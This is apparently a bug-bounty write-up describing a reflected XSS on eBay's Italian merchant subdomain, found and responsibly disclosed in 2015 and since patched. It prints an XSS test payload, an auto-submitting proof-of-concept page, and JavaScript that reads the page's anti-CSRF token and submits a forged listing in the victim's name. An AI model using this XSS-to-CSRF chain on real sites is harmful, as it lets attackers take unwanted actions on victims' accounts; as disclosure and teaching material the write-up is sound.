By

Making you sell what I want: Story of an Ebay XSS

TL;DR

A XSS vulnerability in Ebay can be exploited by an attacker to bypass CSRF protection and make a victim sell unwanted items. This is a pretty basic technique but it could be interesting for people which have just entered in the Bug Bounty world.

XSS on Ebay

Let’s talk about my first bug hunting experience. First of all why have I chosen to test Ebay? Simple:

  • The Ebay website was first developed lots of time ago when the word "security" was not so popular and there weren’t beatiful frameworks which prevents developers to make shit happen;
  • Ebay is a pretty high level profile website and has a Bug Bounty program which awards with a mention in their Security Researchers Acknowledgement page;
  • Ebay doens’t offer a cash award (yes this doesn’t seem to be a pro but this means that not so many people have tested it unlike Google and Facebook);

When trying to find a security issue the best place to search is where other people hasn’t already looked at, so let’s forgot for a moment the main page and let’s search in some other subdomains. Two great tools to discover subdomains are dnsenum and fierce. Looking around I found csr.ebay.it which seems to handle the process of selling items as a merchant. Between the different requests sent to this domain a POST request to http://csr.ebay.it/cse/results.jsf caught my attention because it has a keyword parameter which is reflected in the response.

A good payload which I use to test for XSS is xxx"><svg/onload=alert(1)> because it provides two functionalities:

  1. The string xxx is very unlikely to be present in the page so by inspecting the source code of the HTML page and searching for xxx I can discover the location where my input has been reflected;
  2. The rest of the payload "><svg/onload=alert(1)> may trigger a XSS vulnerability popping up an alert box;

So we intercept the request to http://csr.ebay.it/cse/results.jsf using Burp edit the keyword field with "><svg/onload=alert(1)>, submit the request and wait for:

Yay!!! This is our lucky day but wait a minute where is the session cookie?

Oh no. The session cookie is set HttpOnly this means that it is not accessible through javascript, bye bye session hijacking but let’s see what we could do with it. Let’s first create our PoC page; this is very straightforward, we just need to create an html form containing the fields and the value which we want to submit and submit it as soon as the user visit the page.

<!DOCTYPE html>
<html>
  <head>
    <script src="https://code.jquery.com/jquery-2.1.3.min.js"> </script>
  </head>
  <body>
    <form id="myform" action="http://csr.ebay.it/cse/results.jsf?sbh=true" method="POST">
      <input name="keywords" id="keywords" value="&quot;><svg/onload=alert(document.domain+document.cookie)>" >
      <input name="btnStartGandalf" id="btnStartGandalf" value="Inizia" >
      <input name="startPage" id="startPage" value="true" >
      <input name="pageName" id="pageName" value="start" >
    </form>
  </body>
</html>

<script>
$.ready(
    $('#myform').submit()
      );
</script>

From XSS to CSRF

I won’t bother you on what a CSRF attack is, there are very good explanation out there, the only thing to know is that this attack can be exploited to make the user do unwanted actions and can be prevented by attaching a hidden field csrf_token to the form which will be submitted. Let’s recapt what we know so far:

  1. we can run javascript code through the XSS in crs.ebay.it;
  2. crs.ebay.it domain enables the user to sell items;
  3. the selling functionality is protected against CSRF through a hidden token in the form;

Attack plan: exploit the XSS to exfiltrate the CSRF token and use it to make a request in the behalf of the user. We modify the payload before and instead of displaying an alert message ("><svg/onload=alert(1)>) we include a script which:

  1. Send a GET request to the page containing the token;
  2. Parse the page to get the token value (in our case the javax.faces.ViewState field);
  3. Send a post request to http://csr.ebay.it/cse/list.jsf to publish the product with the fields which we have set in the form validated with the csrf token which we have exfiltrated before;
//Generate the form which will be send to sell the item
var f = document.createElement("form");
f.setAttribute('id',"myform");
f.setAttribute('method',"post");
f.setAttribute('action',"http://csr.ebay.it/cse/list.jsf");

var i1 = document.createElement("input");
i1.setAttribute('type',"text");
i1.setAttribute('name',"title");
i1.setAttribute('value',"Iphone6");

...Add here all the other fields for the item to sell

var i2= document.createElement("input");
i2.setAttribute('type',"text");
i2.setAttribute('name',"javax.faces.ViewState");
i2.setAttribute('id',"javax.faces.ViewState");
i2.setAttribute('value',"");


var s = document.createElement("input");
s.setAttribute('type',"submit");
s.setAttribute('value',"Submit");

document.body.appendChild(f);
f.appendChild(i1);
f.appendChild(i2);
f.appendChild(s);


$.ready(
    $.ajax({
      url:"http://csr.ebay.it/cse/list.jsf?usecase=create&mode=AddItem&categoryId=30095",
      type: 'get',
      //1 sending a get request to the page containing the token
      success: function(data,status){
        var html = $.parseHTML(data);
        //2 parsing the html to find the token value
        var token = $(html).find( 'input[name="javax.faces.ViewState"]' ).val();
        console.log(token)
        //3 setting this value to the csrf_token field in the constructed form
        $("input[id='javax.faces.ViewState']").val(token)
        //4 submitting the form
        $('#myform').submit()
      }
    })
);

Hooray!! We have made the victim, which click on our link, sell an Iphone 6. Kudos to the Ebay security team which has been very responsive and patched the vulnerability in a week. I think that, at the moment, the security level of Ebay is not enough strong considering the sensitive informations and the profitable actions which the platform provide, so I keep wondering why Ebay hasn’t already started a payment based Bug Bounty program on platforms like Hackerone or Bugcrowd.

  • 7 April 2015 Vulnerability reported to Ebay Security Team
  • 15 April 2015 Vulnerability patched
  • 25 May 2015 Added to the Responsible Disclosure Acknowledgements page
  • 20 June 2015 Public disclosure